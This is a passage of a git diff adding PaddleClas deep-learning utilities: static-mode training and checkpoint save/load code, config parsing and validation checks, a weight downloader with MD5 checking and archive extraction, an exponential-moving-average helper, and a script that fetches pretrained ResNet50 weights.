"epoch:{:<3d}".format(epoch) + step_str = "{:s} step:{:<4d}".format(mode, idx) + + if idx % config.get('print_interval', 10) == 0: + logger.info("{:s} {:s} {:s}".format(epoch_str, step_str, + fetchs_str)) + + tic = time.time() + + end_str = ' '.join([str(m.mean) for m in metric_dict.values()] + + [metric_dict["batch_time"].total]) + ips_info = "ips: {:.5f} images/sec.".format( + batch_size * metric_dict["batch_time"].count / + metric_dict["batch_time"].sum) + if mode == 'eval': + logger.info("END {:s} {:s} {:s}".format(mode, end_str, ips_info)) + else: + end_epoch_str = "END epoch:{:<3d}".format(epoch) + logger.info("{:s} {:s} 
{:s} {:s}".format(end_epoch_str, mode, end_str, + ips_info)) + if use_dali: + dataloader.reset() + + # return top1_acc in order to save the best model + if mode == 'eval': + return fetchs["top1"][1].avg diff --git a/Smart_container/PaddleClas/ppcls/static/run_dali.sh b/Smart_container/PaddleClas/ppcls/static/run_dali.sh new file mode 100644 index 0000000..8b33b28 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/static/run_dali.sh @@ -0,0 +1,11 @@ +#!/usr/bin/env bash + +export CUDA_VISIBLE_DEVICES="0,1,2,3,4,5,6,7" +export FLAGS_fraction_of_gpu_memory_to_use=0.80 + +python3.7 -m paddle.distributed.launch \ + --gpus="0,1,2,3,4,5,6,7" \ + ppcls/static//train.py \ + -c ./ppcls/configs/ImageNet/ResNet/ResNet50_fp16.yaml \ + -o Global.use_dali=True + diff --git a/Smart_container/PaddleClas/ppcls/static/save_load.py b/Smart_container/PaddleClas/ppcls/static/save_load.py new file mode 100644 index 0000000..13badfd --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/static/save_load.py @@ -0,0 +1,139 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import errno +import os +import re +import shutil +import tempfile + +import paddle + +from ppcls.utils import logger + +__all__ = ['init_model', 'save_model'] + + +def _mkdir_if_not_exist(path): + """ + mkdir if not exists, ignore the exception when multiprocess mkdir together + """ + if not os.path.exists(path): + try: + os.makedirs(path) + except OSError as e: + if e.errno == errno.EEXIST and os.path.isdir(path): + logger.warning( + 'be happy if some process has already created {}'.format( + path)) + else: + raise OSError('Failed to mkdir {}'.format(path)) + + +def _load_state(path): + if os.path.exists(path + '.pdopt'): + # XXX another hack to ignore the optimizer state + tmp = tempfile.mkdtemp() + dst = os.path.join(tmp, os.path.basename(os.path.normpath(path))) + shutil.copy(path + '.pdparams', dst + '.pdparams') + state = paddle.static.load_program_state(dst) + shutil.rmtree(tmp) + else: + state = paddle.static.load_program_state(path) + return state + + +def load_params(exe, prog, path, ignore_params=None): + """ + Load model from the given path. + Args: + exe (fluid.Executor): The fluid.Executor object. + prog (fluid.Program): load weight to which Program object. + path (string): URL string or loca model path. + ignore_params (list): ignore variable to load when finetuning. + It can be specified by finetune_exclude_pretrained_params + and the usage can refer to the document + docs/advanced_tutorials/TRANSFER_LEARNING.md + """ + if not (os.path.isdir(path) or os.path.exists(path + '.pdparams')): + raise ValueError("Model pretrain path {} does not " + "exists.".format(path)) + + logger.info("Loading parameters from {}...".format(path)) + + ignore_set = set() + state = _load_state(path) + + # ignore the parameter which mismatch the shape + # between the model and pretrain weight. 
+ all_var_shape = {} + for block in prog.blocks: + for param in block.all_parameters(): + all_var_shape[param.name] = param.shape + ignore_set.update([ + name for name, shape in all_var_shape.items() + if name in state and shape != state[name].shape + ]) + + if ignore_params: + all_var_names = [var.name for var in prog.list_vars()] + ignore_list = filter( + lambda var: any([re.match(name, var) for name in ignore_params]), + all_var_names) + ignore_set.update(list(ignore_list)) + + if len(ignore_set) > 0: + for k in ignore_set: + if k in state: + logger.warning( + 'variable {} is already excluded automatically'.format(k)) + del state[k] + + paddle.static.set_program_state(prog, state) + + +def init_model(config, program, exe): + """ + load model from checkpoint or pretrained_model + """ + checkpoints = config.get('checkpoints') + if checkpoints: + paddle.static.load(program, checkpoints, exe) + logger.info("Finish initing model from {}".format(checkpoints)) + return + + pretrained_model = config.get('pretrained_model') + if pretrained_model: + if not isinstance(pretrained_model, list): + pretrained_model = [pretrained_model] + for pretrain in pretrained_model: + load_params(exe, program, pretrain) + logger.info("Finish initing model from {}".format(pretrained_model)) + + +def save_model(program, model_path, epoch_id, prefix='ppcls'): + """ + save model to the target path + """ + if paddle.distributed.get_rank() != 0: + return + model_path = os.path.join(model_path, str(epoch_id)) + _mkdir_if_not_exist(model_path) + model_prefix = os.path.join(model_path, prefix) + paddle.static.save(program, model_prefix) + logger.info("Already save model in {}".format(model_path)) diff --git a/Smart_container/PaddleClas/ppcls/static/train.py b/Smart_container/PaddleClas/ppcls/static/train.py new file mode 100644 index 0000000..a3aa0b5 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/static/train.py @@ -0,0 +1,204 @@ +# copyright (c) 2020 PaddlePaddle Authors. 
All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import argparse +import os +import sys +__dir__ = os.path.dirname(os.path.abspath(__file__)) +sys.path.append(__dir__) +sys.path.append(os.path.abspath(os.path.join(__dir__, '../../'))) + +import paddle +from paddle.distributed import fleet +from visualdl import LogWriter + +from ppcls.data import build_dataloader +from ppcls.utils.config import get_config, print_config +from ppcls.utils import logger +from ppcls.utils.logger import init_logger +from ppcls.static.save_load import init_model, save_model +from ppcls.static import program + + +def parse_args(): + parser = argparse.ArgumentParser("PaddleClas train script") + parser.add_argument( + '-c', + '--config', + type=str, + default='configs/ResNet/ResNet50.yaml', + help='config file path') + parser.add_argument( + '-p', + '--profiler_options', + type=str, + default=None, + help='The option of profiler, which should be in format \"key1=value1;key2=value2;key3=value3\".' 
+ ) + parser.add_argument( + '-o', + '--override', + action='append', + default=[], + help='config options to be overridden') + args = parser.parse_args() + return args + + +def main(args): + """ + all the config of training paradigm should be in config["Global"] + """ + config = get_config(args.config, overrides=args.override, show=False) + global_config = config["Global"] + + mode = "train" + + log_file = os.path.join(global_config['output_dir'], + config["Arch"]["name"], f"{mode}.log") + init_logger(name='root', log_file=log_file) + print_config(config) + + if global_config.get("is_distributed", True): + fleet.init(is_collective=True) + # assign the device + use_gpu = global_config.get("use_gpu", True) + # amp related config + if 'AMP' in config: + AMP_RELATED_FLAGS_SETTING = { + 'FLAGS_cudnn_exhaustive_search': "1", + 'FLAGS_conv_workspace_size_limit': "1500", + 'FLAGS_cudnn_batchnorm_spatial_persistent': "1", + 'FLAGS_max_indevice_grad_add': "8", + "FLAGS_cudnn_batchnorm_spatial_persistent": "1", + } + for k in AMP_RELATED_FLAGS_SETTING: + os.environ[k] = AMP_RELATED_FLAGS_SETTING[k] + + use_xpu = global_config.get("use_xpu", False) + assert ( + use_gpu and use_xpu + ) is not True, "gpu and xpu can not be true in the same time in static mode!" 
+ + if use_gpu: + device = paddle.set_device('gpu') + elif use_xpu: + device = paddle.set_device('xpu') + else: + device = paddle.set_device('cpu') + + # visualDL + vdl_writer = None + if global_config["use_visualdl"]: + vdl_dir = os.path.join(global_config["output_dir"], "vdl") + vdl_writer = LogWriter(vdl_dir) + + # build dataloader + eval_dataloader = None + use_dali = global_config.get('use_dali', False) + + train_dataloader = build_dataloader( + config["DataLoader"], "Train", device=device, use_dali=use_dali) + if global_config["eval_during_train"]: + eval_dataloader = build_dataloader( + config["DataLoader"], "Eval", device=device, use_dali=use_dali) + + step_each_epoch = len(train_dataloader) + + # startup_prog is used to do some parameter init work, + # and train prog is used to hold the network + startup_prog = paddle.static.Program() + train_prog = paddle.static.Program() + + best_top1_acc = 0.0 # best top1 acc record + + train_fetchs, lr_scheduler, train_feeds, optimizer = program.build( + config, + train_prog, + startup_prog, + step_each_epoch=step_each_epoch, + is_train=True, + is_distributed=global_config.get("is_distributed", True)) + + if global_config["eval_during_train"]: + eval_prog = paddle.static.Program() + eval_fetchs, _, eval_feeds, _ = program.build( + config, + eval_prog, + startup_prog, + is_train=False, + is_distributed=global_config.get("is_distributed", True)) + # clone to prune some content which is irrelevant in eval_prog + eval_prog = eval_prog.clone(for_test=True) + + # create the "Executor" with the statement of which device + exe = paddle.static.Executor(device) + # Parameter initialization + exe.run(startup_prog) + # load pretrained models or checkpoints + init_model(global_config, train_prog, exe) + + if 'AMP' in config and config.AMP.get("use_pure_fp16", False): + optimizer.amp_init( + device, + scope=paddle.static.global_scope(), + test_program=eval_prog + if global_config["eval_during_train"] else None) + + if not 
global_config.get("is_distributed", True): + compiled_train_prog = program.compile( + config, train_prog, loss_name=train_fetchs["loss"][0].name) + else: + compiled_train_prog = train_prog + + if eval_dataloader is not None: + compiled_eval_prog = program.compile(config, eval_prog) + + for epoch_id in range(global_config["epochs"]): + # 1. train with train dataset + program.run(train_dataloader, exe, compiled_train_prog, train_feeds, + train_fetchs, epoch_id, 'train', config, vdl_writer, + lr_scheduler, args.profiler_options) + # 2. evaate with eval dataset + if global_config["eval_during_train"] and epoch_id % global_config[ + "eval_interval"] == 0: + top1_acc = program.run(eval_dataloader, exe, compiled_eval_prog, + eval_feeds, eval_fetchs, epoch_id, "eval", + config) + if top1_acc > best_top1_acc: + best_top1_acc = top1_acc + message = "The best top1 acc {:.5f}, in epoch: {:d}".format( + best_top1_acc, epoch_id) + logger.info(message) + if epoch_id % global_config["save_interval"] == 0: + + model_path = os.path.join(global_config["output_dir"], + config["Arch"]["name"]) + save_model(train_prog, model_path, "best_model") + + # 3. save the persistable model + if epoch_id % global_config["save_interval"] == 0: + model_path = os.path.join(global_config["output_dir"], + config["Arch"]["name"]) + save_model(train_prog, model_path, epoch_id) + + +if __name__ == '__main__': + paddle.enable_static() + args = parse_args() + main(args) diff --git a/Smart_container/PaddleClas/ppcls/utils/__init__.py b/Smart_container/PaddleClas/ppcls/utils/__init__.py new file mode 100644 index 0000000..632cc78 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/utils/__init__.py @@ -0,0 +1,27 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. 
+# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from . import logger +from . import misc +from . import model_zoo +from . import metrics + +from .save_load import init_model, save_model +from .config import get_config +from .misc import AverageMeter +from .metrics import multi_hot_encode +from .metrics import hamming_distance +from .metrics import accuracy_score +from .metrics import precision_recall_fscore +from .metrics import mean_average_precision diff --git a/Smart_container/PaddleClas/ppcls/utils/check.py b/Smart_container/PaddleClas/ppcls/utils/check.py new file mode 100644 index 0000000..bc70308 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/utils/check.py @@ -0,0 +1,151 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import os +import sys + +import paddle +from paddle import is_compiled_with_cuda + +from ppcls.arch import get_architectures +from ppcls.arch import similar_architectures +from ppcls.arch import get_blacklist_model_in_static_mode +from ppcls.utils import logger + + +def check_version(): + """ + Log error and exit when the installed version of paddlepaddle is + not satisfied. + """ + err = "PaddlePaddle version 1.8.0 or higher is required, " \ + "or a suitable develop version is satisfied as well. \n" \ + "Please make sure the version is good with your code." + try: + pass + # paddle.utils.require_version('0.0.0') + except Exception: + logger.error(err) + sys.exit(1) + + +def check_gpu(): + """ + Log error and exit when using paddlepaddle cpu version. + """ + err = "You are using paddlepaddle cpu version! Please try to " \ + "install paddlepaddle-gpu to run model on GPU." + + try: + assert is_compiled_with_cuda() + except AssertionError: + logger.error(err) + sys.exit(1) + + +def check_architecture(architecture): + """ + check architecture and recommend similar architectures + """ + assert isinstance(architecture, dict), \ + ("the type of architecture({}) should be dict". format(architecture)) + assert "name" in architecture, \ + ("name must be in the architecture keys, just contains: {}". format( + architecture.keys())) + + similar_names = similar_architectures(architecture["name"], + get_architectures()) + model_list = ', '.join(similar_names) + err = "Architecture [{}] is not exist! 
Maybe you want: [{}]" \
+          "".format(architecture["name"], model_list)
+    try:
+        assert architecture["name"] in similar_names
+    except AssertionError:
+        logger.error(err)
+        sys.exit(1)
+
+
+def check_model_with_running_mode(architecture):
+    """
+    check whether the model is consistent with the operating mode
+    """
+    # some model are not supported in the static mode
+    blacklist = get_blacklist_model_in_static_mode()
+    if not paddle.in_dynamic_mode() and architecture["name"] in blacklist:
+        logger.error("Model: {} is not supported in the static mode.".format(
+            architecture["name"]))
+        sys.exit(1)
+    return
+
+
+def check_mix(architecture, use_mix=False):
+    """
+    check mix parameter
+    """
+    err = "Cannot use mix processing in GoogLeNet, " \
+          "please set use_mix = False."
+    try:
+        if architecture["name"] == "GoogLeNet":
+            assert use_mix is not True
+    except AssertionError:
+        logger.error(err)
+        sys.exit(1)
+
+
+def check_classes_num(classes_num):
+    """
+    check classes_num
+    """
+    err = "classes_num({}) should be a positive integer" \
+          "and larger than 1".format(classes_num)
+    try:
+        assert isinstance(classes_num, int)
+        assert classes_num > 1
+    except AssertionError:
+        logger.error(err)
+        sys.exit(1)
+
+
+def check_data_dir(path):
+    """
+    check data_dir
+    """
+    err = "Data path {} does not exist, please provide a correct path" \
+          "".format(path)
+    try:
+        assert os.path.isdir(path)
+    except AssertionError:
+        logger.error(err)
+        sys.exit(1)
+
+
+def check_function_params(config, key):
+    """
+    check specify config
+    """
+    k_config = config.get(key)
+    assert k_config is not None, \
+        ('{} is required in config'.format(key))
+
+    assert k_config.get('function'), \
+        ('function is required {} config'.format(key))
+    params = k_config.get('params')
+    assert params is not None, \
+        ('params is required in {} config'.format(key))
+    assert isinstance(params, dict), \
+        ('the params in {} config should be a dict'.format(key))
diff --git a/Smart_container/PaddleClas/ppcls/utils/config.py 
b/Smart_container/PaddleClas/ppcls/utils/config.py new file mode 100644 index 0000000..b92f0d9 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/utils/config.py @@ -0,0 +1,203 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import os +import copy +import argparse +import yaml +from ppcls.utils import logger +from ppcls.utils import check +__all__ = ['get_config'] + + +class AttrDict(dict): + def __getattr__(self, key): + return self[key] + + def __setattr__(self, key, value): + if key in self.__dict__: + self.__dict__[key] = value + else: + self[key] = value + + def __deepcopy__(self, content): + return copy.deepcopy(dict(self)) + + +def create_attr_dict(yaml_config): + from ast import literal_eval + for key, value in yaml_config.items(): + if type(value) is dict: + yaml_config[key] = value = AttrDict(value) + if isinstance(value, str): + try: + value = literal_eval(value) + except BaseException: + pass + if isinstance(value, AttrDict): + create_attr_dict(yaml_config[key]) + else: + yaml_config[key] = value + + +def parse_config(cfg_file): + """Load a config file into AttrDict""" + with open(cfg_file, 'r') as fopen: + yaml_config = AttrDict(yaml.load(fopen, Loader=yaml.SafeLoader)) + create_attr_dict(yaml_config) + return yaml_config + + +def print_dict(d, delimiter=0): + """ + Recursively visualize a dict and + indenting acrrording by the relationship of keys. 
+ """ + placeholder = "-" * 60 + for k, v in sorted(d.items()): + if isinstance(v, dict): + logger.info("{}{} : ".format(delimiter * " ", k)) + print_dict(v, delimiter + 4) + elif isinstance(v, list) and len(v) >= 1 and isinstance(v[0], dict): + logger.info("{}{} : ".format(delimiter * " ", k)) + for value in v: + print_dict(value, delimiter + 4) + else: + logger.info("{}{} : {}".format(delimiter * " ", k, v)) + if k.isupper(): + logger.info(placeholder) + + +def print_config(config): + """ + visualize configs + Arguments: + config: configs + """ + logger.advertise() + print_dict(config) + + +def check_config(config): + """ + Check config + """ + check.check_version() + use_gpu = config.get('use_gpu', True) + if use_gpu: + check.check_gpu() + architecture = config.get('ARCHITECTURE') + #check.check_architecture(architecture) + use_mix = config.get('use_mix', False) + check.check_mix(architecture, use_mix) + classes_num = config.get('classes_num') + check.check_classes_num(classes_num) + mode = config.get('mode', 'train') + if mode.lower() == 'train': + check.check_function_params(config, 'LEARNING_RATE') + check.check_function_params(config, 'OPTIMIZER') + + +def override(dl, ks, v): + """ + Recursively replace dict of list + Args: + dl(dict or list): dict or list to be replaced + ks(list): list of keys + v(str): value to be replaced + """ + + def str2num(v): + try: + return eval(v) + except Exception: + return v + + assert isinstance(dl, (list, dict)), ("{} should be a list or a dict") + assert len(ks) > 0, ('lenght of keys should larger than 0') + if isinstance(dl, list): + k = str2num(ks[0]) + if len(ks) == 1: + assert k < len(dl), ('index({}) out of range({})'.format(k, dl)) + dl[k] = str2num(v) + else: + override(dl[k], ks[1:], v) + else: + if len(ks) == 1: + # assert ks[0] in dl, ('{} is not exist in {}'.format(ks[0], dl)) + if not ks[0] in dl: + print('A new filed ({}) detected!'.format(ks[0], dl)) + dl[ks[0]] = str2num(v) + else: + override(dl[ks[0]], 
ks[1:], v) + + +def override_config(config, options=None): + """ + Recursively override the config + Args: + config(dict): dict to be replaced + options(list): list of pairs(key0.key1.idx.key2=value) + such as: [ + 'topk=2', + 'VALID.transforms.1.ResizeImage.resize_short=300' + ] + Returns: + config(dict): replaced config + """ + if options is not None: + for opt in options: + assert isinstance(opt, str), ( + "option({}) should be a str".format(opt)) + assert "=" in opt, ( + "option({}) should contain a =" + "to distinguish between key and value".format(opt)) + pair = opt.split('=') + assert len(pair) == 2, ("there can be only a = in the option") + key, value = pair + keys = key.split('.') + override(config, keys, value) + return config + + +def get_config(fname, overrides=None, show=False): + """ + Read config from file + """ + assert os.path.exists(fname), ( + 'config file({}) is not exist'.format(fname)) + config = parse_config(fname) + override_config(config, overrides) + if show: + print_config(config) + # check_config(config) + return config + + +def parse_args(): + parser = argparse.ArgumentParser("generic-image-rec train script") + parser.add_argument( + '-c', + '--config', + type=str, + default='configs/config.yaml', + help='config file path') + parser.add_argument( + '-o', + '--override', + action='append', + default=[], + help='config options to be overridden') + args = parser.parse_args() + return args diff --git a/Smart_container/PaddleClas/ppcls/utils/download.py b/Smart_container/PaddleClas/ppcls/utils/download.py new file mode 100644 index 0000000..9c45750 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/utils/download.py @@ -0,0 +1,319 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. 
+# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import os +import sys +import os.path as osp +import shutil +import requests +import hashlib +import tarfile +import zipfile +import time +from collections import OrderedDict +from tqdm import tqdm + +from ppcls.utils import logger + +__all__ = ['get_weights_path_from_url'] + +WEIGHTS_HOME = osp.expanduser("~/.paddleclas/weights") + +DOWNLOAD_RETRY_LIMIT = 3 + + +def is_url(path): + """ + Whether path is URL. + Args: + path (string): URL string or not. + """ + return path.startswith('http://') or path.startswith('https://') + + +def get_weights_path_from_url(url, md5sum=None): + """Get weights path from WEIGHT_HOME, if not exists, + download it from url. + + Args: + url (str): download url + md5sum (str): md5 sum of download package + + Returns: + str: a local path to save downloaded weights. + + Examples: + .. 
code-block:: python + + from paddle.utils.download import get_weights_path_from_url + + resnet18_pretrained_weight_url = 'https://paddle-hapi.bj.bcebos.com/models/resnet18.pdparams' + local_weight_path = get_weights_path_from_url(resnet18_pretrained_weight_url) + + """ + path = get_path_from_url(url, WEIGHTS_HOME, md5sum) + return path + + +def _map_path(url, root_dir): + # parse path after download under root_dir + fname = osp.split(url)[-1] + fpath = fname + return osp.join(root_dir, fpath) + + +def _get_unique_endpoints(trainer_endpoints): + # Sorting is to avoid different environmental variables for each card + trainer_endpoints.sort() + ips = set() + unique_endpoints = set() + for endpoint in trainer_endpoints: + ip = endpoint.split(":")[0] + if ip in ips: + continue + ips.add(ip) + unique_endpoints.add(endpoint) + logger.info("unique_endpoints {}".format(unique_endpoints)) + return unique_endpoints + + +def get_path_from_url(url, + root_dir, + md5sum=None, + check_exist=True, + decompress=True): + """ Download from given url to root_dir. + if file or directory specified by url is exists under + root_dir, return the path directly, otherwise download + from url and decompress it, return the path. + + Args: + url (str): download url + root_dir (str): root dir for downloading, it should be + WEIGHTS_HOME or DATASET_HOME + md5sum (str): md5 sum of download package + + Returns: + str: a local path to save downloaded models & weights & datasets. + """ + + from paddle.fluid.dygraph.parallel import ParallelEnv + + assert is_url(url), "downloading from {} not a url".format(url) + # parse path after download to decompress under root_dir + fullpath = _map_path(url, root_dir) + # Mainly used to solve the problem of downloading data from different + # machines in the case of multiple machines. Different ips will download + # data, and the same ip will only download data once. 
+ unique_endpoints = _get_unique_endpoints(ParallelEnv() + .trainer_endpoints[:]) + if osp.exists(fullpath) and check_exist and _md5check(fullpath, md5sum): + logger.info("Found {}".format(fullpath)) + else: + if ParallelEnv().current_endpoint in unique_endpoints: + fullpath = _download(url, root_dir, md5sum) + else: + while not os.path.exists(fullpath): + time.sleep(1) + + if ParallelEnv().current_endpoint in unique_endpoints: + if decompress and (tarfile.is_tarfile(fullpath) or + zipfile.is_zipfile(fullpath)): + fullpath = _decompress(fullpath) + + return fullpath + + +def _download(url, path, md5sum=None): + """ + Download from url, save to path. + + url (str): download url + path (str): download to given path + """ + if not osp.exists(path): + os.makedirs(path) + + fname = osp.split(url)[-1] + fullname = osp.join(path, fname) + retry_cnt = 0 + + while not (osp.exists(fullname) and _md5check(fullname, md5sum)): + if retry_cnt < DOWNLOAD_RETRY_LIMIT: + retry_cnt += 1 + else: + raise RuntimeError("Download from {} failed. " + "Retry limit reached".format(url)) + + logger.info("Downloading {} from {}".format(fname, url)) + + try: + req = requests.get(url, stream=True) + except Exception as e: # requests.exceptions.ConnectionError + logger.info( + "Downloading {} from {} failed {} times with exception {}". 
+ format(fname, url, retry_cnt + 1, str(e))) + time.sleep(1) + continue + + if req.status_code != 200: + raise RuntimeError("Downloading from {} failed with code " + "{}!".format(url, req.status_code)) + + # For protecting download interupted, download to + # tmp_fullname firstly, move tmp_fullname to fullname + # after download finished + tmp_fullname = fullname + "_tmp" + total_size = req.headers.get('content-length') + with open(tmp_fullname, 'wb') as f: + if total_size: + with tqdm(total=(int(total_size) + 1023) // 1024) as pbar: + for chunk in req.iter_content(chunk_size=1024): + f.write(chunk) + pbar.update(1) + else: + for chunk in req.iter_content(chunk_size=1024): + if chunk: + f.write(chunk) + shutil.move(tmp_fullname, fullname) + + return fullname + + +def _md5check(fullname, md5sum=None): + if md5sum is None: + return True + + logger.info("File {} md5 checking...".format(fullname)) + md5 = hashlib.md5() + with open(fullname, 'rb') as f: + for chunk in iter(lambda: f.read(4096), b""): + md5.update(chunk) + calc_md5sum = md5.hexdigest() + + if calc_md5sum != md5sum: + logger.info("File {} md5 check failed, {}(calc) != " + "{}(base)".format(fullname, calc_md5sum, md5sum)) + return False + return True + + +def _decompress(fname): + """ + Decompress for zip and tar file + """ + logger.info("Decompressing {}...".format(fname)) + + # For protecting decompressing interupted, + # decompress to fpath_tmp directory firstly, if decompress + # successed, move decompress files to fpath and delete + # fpath_tmp and remove download compress file. 
+ + if tarfile.is_tarfile(fname): + uncompressed_path = _uncompress_file_tar(fname) + elif zipfile.is_zipfile(fname): + uncompressed_path = _uncompress_file_zip(fname) + else: + raise TypeError("Unsupport compress file type {}".format(fname)) + + return uncompressed_path + + +def _uncompress_file_zip(filepath): + files = zipfile.ZipFile(filepath, 'r') + file_list = files.namelist() + + file_dir = os.path.dirname(filepath) + + if _is_a_single_file(file_list): + rootpath = file_list[0] + uncompressed_path = os.path.join(file_dir, rootpath) + + for item in file_list: + files.extract(item, file_dir) + + elif _is_a_single_dir(file_list): + rootpath = os.path.splitext(file_list[0])[0].split(os.sep)[-1] + uncompressed_path = os.path.join(file_dir, rootpath) + + for item in file_list: + files.extract(item, file_dir) + + else: + rootpath = os.path.splitext(filepath)[0].split(os.sep)[-1] + uncompressed_path = os.path.join(file_dir, rootpath) + if not os.path.exists(uncompressed_path): + os.makedirs(uncompressed_path) + for item in file_list: + files.extract(item, os.path.join(file_dir, rootpath)) + + files.close() + + return uncompressed_path + + +def _uncompress_file_tar(filepath, mode="r:*"): + files = tarfile.open(filepath, mode) + file_list = files.getnames() + + file_dir = os.path.dirname(filepath) + + if _is_a_single_file(file_list): + rootpath = file_list[0] + uncompressed_path = os.path.join(file_dir, rootpath) + for item in file_list: + files.extract(item, file_dir) + elif _is_a_single_dir(file_list): + rootpath = os.path.splitext(file_list[0])[0].split(os.sep)[-1] + uncompressed_path = os.path.join(file_dir, rootpath) + for item in file_list: + files.extract(item, file_dir) + else: + rootpath = os.path.splitext(filepath)[0].split(os.sep)[-1] + uncompressed_path = os.path.join(file_dir, rootpath) + if not os.path.exists(uncompressed_path): + os.makedirs(uncompressed_path) + + for item in file_list: + files.extract(item, os.path.join(file_dir, rootpath)) + + 
files.close()
+
+    return uncompressed_path
+
+
+def _is_a_single_file(file_list):
+    if len(file_list) == 1 and file_list[0].find(os.sep) < 0:
+        return True
+    return False
+
+
+def _is_a_single_dir(file_list):
+    new_file_list = []
+    for file_path in file_list:
+        if '/' in file_path:
+            file_path = file_path.replace('/', os.sep)
+        elif '\\' in file_path:
+            file_path = file_path.replace('\\', os.sep)
+        new_file_list.append(file_path)
+
+    file_name = new_file_list[0].split(os.sep)[0]
+    for i in range(1, len(new_file_list)):
+        if file_name != new_file_list[i].split(os.sep)[0]:
+            return False
+    return True
diff --git a/Smart_container/PaddleClas/ppcls/utils/ema.py b/Smart_container/PaddleClas/ppcls/utils/ema.py
new file mode 100644
index 0000000..e41f472
--- /dev/null
+++ b/Smart_container/PaddleClas/ppcls/utils/ema.py
@@ -0,0 +1,58 @@
+# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+ +import paddle +import numpy as np + + +class ExponentialMovingAverage(): + def __init__(self, model, decay, thres_steps=True): + self._model = model + self._decay = decay + self._thres_steps = thres_steps + self._shadow = {} + self._backup = {} + + def register(self): + self._update_step = 0 + for name, param in self._model.named_parameters(): + if param.stop_gradient is False: + self._shadow[name] = param.numpy().copy() + + def update(self): + decay = min(self._decay, (1 + self._update_step) / ( + 10 + self._update_step)) if self._thres_steps else self._decay + for name, param in self._model.named_parameters(): + if param.stop_gradient is False: + assert name in self._shadow + new_val = np.array(param.numpy().copy()) + old_val = np.array(self._shadow[name]) + new_average = decay * old_val + (1 - decay) * new_val + self._shadow[name] = new_average + self._update_step += 1 + return decay + + def apply(self): + for name, param in self._model.named_parameters(): + if param.stop_gradient is False: + assert name in self._shadow + self._backup[name] = np.array(param.numpy().copy()) + param.set_value(np.array(self._shadow[name])) + + def restore(self): + for name, param in self._model.named_parameters(): + if param.stop_gradient is False: + assert name in self._backup + param.set_value(self._backup[name]) + self._backup = {} diff --git a/Smart_container/PaddleClas/ppcls/utils/feature_maps_visualization/download_resnet50_pretrained.sh b/Smart_container/PaddleClas/ppcls/utils/feature_maps_visualization/download_resnet50_pretrained.sh new file mode 100644 index 0000000..286c240 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/utils/feature_maps_visualization/download_resnet50_pretrained.sh @@ -0,0 +1,2 @@ +wget https://paddle-imagenet-models-name.bj.bcebos.com/ResNet50_pretrained.tar +tar -xf ResNet50_pretrained.tar \ No newline at end of file diff --git a/Smart_container/PaddleClas/ppcls/utils/feature_maps_visualization/fm_vis.py 
def parse_args():
    """Parse command-line options for the feature-map visualization tool.

    Returns:
        argparse.Namespace with fields: image_file, channel_num,
